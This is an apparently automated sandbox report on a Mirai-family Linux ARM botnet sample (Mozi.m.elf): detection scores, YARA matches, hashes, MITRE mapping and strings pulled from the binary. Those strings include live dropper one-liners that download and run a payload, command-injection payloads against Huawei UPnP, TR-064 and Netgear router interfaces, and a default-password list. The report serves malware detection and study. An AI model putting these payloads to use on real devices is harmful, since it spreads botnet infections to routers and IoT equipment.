Linux Analysis Report
Mozi.m.elf

Overview

General Information

Sample name: Mozi.m.elf
Analysis ID: 1651019
MD5: a418ef994dc1f9159012ea97c9d99834
SHA1: aa6710a73df21e364d59785fc0d3f03b9783b880
SHA256: caaff8c0f1d39424f4f3c55f5199bd709d78e343bc6050ed62d91bd6282df552
Tags: elf, user-abuse_ch

Detection

Mirai
Score: 96
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1651019
Start date and time: 2025-03-28 11:03:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: Mozi.m.elf
Detection: MAL
Classification: mal96.troj.linELF@0/0@2/0
Command: /tmp/Mozi.m.elf
PID: 5430
Exit Code: 135
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5408, Parent: 3588)
  • rm (PID: 5408, Parent: 3588, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
  • dash New Fork (PID: 5409, Parent: 3588)
  • cat (PID: 5409, Parent: 3588, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.23fD2FP8ru
  • dash New Fork (PID: 5410, Parent: 3588)
  • head (PID: 5410, Parent: 3588, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5411, Parent: 3588)
  • tr (PID: 5411, Parent: 3588, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5412, Parent: 3588)
  • cut (PID: 5412, Parent: 3588, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5413, Parent: 3588)
  • cat (PID: 5413, Parent: 3588, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.23fD2FP8ru
  • dash New Fork (PID: 5414, Parent: 3588)
  • head (PID: 5414, Parent: 3588, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5415, Parent: 3588)
  • tr (PID: 5415, Parent: 3588, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5416, Parent: 3588)
  • cut (PID: 5416, Parent: 3588, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5417, Parent: 3588)
  • rm (PID: 5417, Parent: 3588, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
  • Mozi.m.elf (PID: 5430, Parent: 5342, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Mozi.m.elf
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source | Rule | Description | Author | Strings
Mozi.m.elf | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
Mozi.m.elf | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |
Mozi.m.elf | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security |
Mozi.m.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Mozi.m.elf | Linux_Trojan_Mirai_5c62e6b2 | unknown | unknown | 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
(2 further entries collapsed in the source report)

Source | Rule | Description | Author | Strings
5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security |
5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |
5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp | Linux_Trojan_Mirai_5c62e6b2 | unknown | unknown | 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
(4 further entries collapsed in the source report)

No Suricata rule has matched

AV Detection

Source: Mozi.m.elf | Avira: detected
Source: Mozi.m.elf | Virustotal: Detection: 60%
Source: Mozi.m.elf | ReversingLabs: Detection: 52%
Source: Mozi.m.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m.elf | String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: global traffic | TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
Source: unknown | TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: Mozi.m.elf | String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m.elf | String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m.elf | String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m.elf | String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.m.elf | String found in binary or memory: http://127.0.0.1
Source: Mozi.m.elf | String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m.elf | String found in binary or memory: http://HTTP/1.1
Source: Mozi.m.elf | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: Mozi.m.elf | String found in binary or memory: http://ipinfo.io/ip
Source: Mozi.m.elf | String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: unknown | Network traffic detected: HTTP traffic on port 48202 -> 443

System Summary

Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: Initial sample | String containing 'busybox' found: busybox
Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample | String containing potential weak password found: admin
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: support
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: 123456
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | Potential command found: GET /c HTTP/1.0
Source: Initial sample | Potential command found: GET %s HTTP/1.1
Source: Initial sample | Potential command found: GET /c
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample | Potential command found: GET /%s HTTP/1.1
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IF
Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: Mozi.m.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: classification engine | Classification label: mal96.troj.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5408) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
Source: /usr/bin/dash (PID: 5417) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
Source: /tmp/Mozi.m.elf (PID: 5430) | Queries kernel information via 'uname'
Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmp | Binary or memory string: ^tU!/etc/qemu-binfmt/arm
Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmp | Binary or memory string: ^tUrg.qemu.gdb.arm.sys.regs">
Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm
Source: Mozi.m.elf, 5430.1.00007ffeb297b000.00007ffeb299c000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm
Source: Mozi.m.elf, 5430.1.00007ffeb297b000.00007ffeb299c000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Mozi.m.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.elf
Source: Mozi.m.elf, 5430.1.000055745ed7f000.000055745ee8b000.rw-.sdmp | Binary or memory string: rg.qemu.gdb.arm.sys.regs">

Stealing of Sensitive Information

Source: Yara match | File source: Mozi.m.elf, type: SAMPLE
Source: Yara match | File source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mozi.m.elf PID: 5430, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Mozi.m.elf, type: SAMPLE
Source: Yara match | File source: 5430.1.00007f26e4017000.00007f26e4058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5430.1.00007f26e4060000.00007f26e406a000.rw-.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mozi.m.elf PID: 5430, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques flagged by the analysis carry their hit count in brackets; the remaining entries are unflagged matrix cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
Resource Development: Scripting [1]; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Command and Scripting Interpreter [1]; Scheduled Task/Job; At
Persistence: Scripting [1]; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: File Deletion [1]; Rootkit; Obfuscated Files or Information
Credential Access: Brute Force [1]; LSASS Memory; Security Account Manager
Discovery: Security Software Discovery [11]; Application Window Discovery; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Command and Control: Encrypted Channel [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [2]
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact
                  No configs have been found
Behavior Graph ID: 1651019; Sample: Mozi.m.elf; Start date: 28/03/2025; Architecture: LINUX; Score: 96
Network nodes: 185.125.190.26, 443 (CANONICAL-ASGB, United Kingdom); daisy.ubuntu.com
Signatures on the sample node: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Mirai
Process nodes started: "dash rm Mozi.m.elf"; "dash rm"; "dash cut"; 7 other processes
Source | Detection | Scanner | Label
Mozi.m.elf | 60% | Virustotal |
Mozi.m.elf | 53% | ReversingLabs | Linux.Backdoor.Mirai
Mozi.m.elf | 100% | Avira | EXP/ELF.Mirai.O
No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.25 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://%s:%d/bin.sh;chmod | Mozi.m.elf | false | | high
http://ipinfo.io/ip | Mozi.m.elf | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | Mozi.m.elf | false | | high
http://%s:%d/bin.sh | Mozi.m.elf | false | | high
http://purenetworks.com/HNAP1/ | Mozi.m.elf | false | | high
http://%s:%d/Mozi.m; | Mozi.m.elf | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | Mozi.m.elf | false | | high
http://HTTP/1.1 | Mozi.m.elf | false | | high
http://127.0.0.1 | Mozi.m.elf | false | | high
http://baidu.com/%s/%s/%d/%s/%s/%s/%s) | Mozi.m.elf | false | | high
http://schemas.xmlsoap.org/soap/envelope// | Mozi.m.elf | false | | high
http://%s:%d/Mozi.m | Mozi.m.elf | false | | high
http://127.0.0.1sendcmd | Mozi.m.elf | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
185.125.190.26 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.125.190.26sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            SecuriteInfo.com.ELF.Mirai-AXV.27459.929.elfGet hashmaliciousUnknownBrowse
                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                                arm5.elfGet hashmaliciousUnknownBrowse
Match: daisy.ubuntu.com
Associated Sample Name / URL | Detection | Threat Name | Context
sshd.elf | malicious | Unknown | 162.213.35.25
.i.elf | malicious | Unknown | 162.213.35.24
bimbo-arm6.elf | malicious | Unknown | 162.213.35.24
resgod.x86.elf | malicious | Mirai | 162.213.35.25
resgod.arc.elf | malicious | Mirai | 162.213.35.24
resgod.mips.elf | malicious | Mirai | 162.213.35.25
resgod.arm6.elf | malicious | Mirai | 162.213.35.24
resgod.spc.elf | malicious | Mirai | 162.213.35.25
resgod.m68k.elf | malicious | Mirai | 162.213.35.24
resgod.arm.elf | malicious | Mirai | 162.213.35.25
Match: CANONICAL-ASGB
Associated Sample Name / URL | Detection | Threat Name | Context
na.elf | malicious | Prometei | 91.189.91.42
vjwe68k.elf | malicious | Unknown | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
i.elf | malicious | Mirai | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
na.elf | malicious | Prometei | 91.189.91.42
sshd.elf | malicious | Unknown | 91.189.91.42
No context
No context
No created / dropped files found
File type: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
Entropy (8bit): 6.027433742547694
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: Mozi.m.elf
File size: 285'420 bytes
MD5: a418ef994dc1f9159012ea97c9d99834
SHA1: aa6710a73df21e364d59785fc0d3f03b9783b880
SHA256: caaff8c0f1d39424f4f3c55f5199bd709d78e343bc6050ed62d91bd6282df552
SHA512: 35b95d32def7303296b65454bd7cfdf59f9dc37f01a28f215a1b83a770a2d46c54f43052cac16ed1a652b6f9073ab76fd78b78f058b59f15e091ec71b2a6d840
SSDEEP: 6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJg:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBU
TLSH: 17543A8AFD81AE25D5C1267BFE2F428A331317B8D2EB71129D145F2876CA94F0F3A541
File Content Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S


• Total Packets: 4
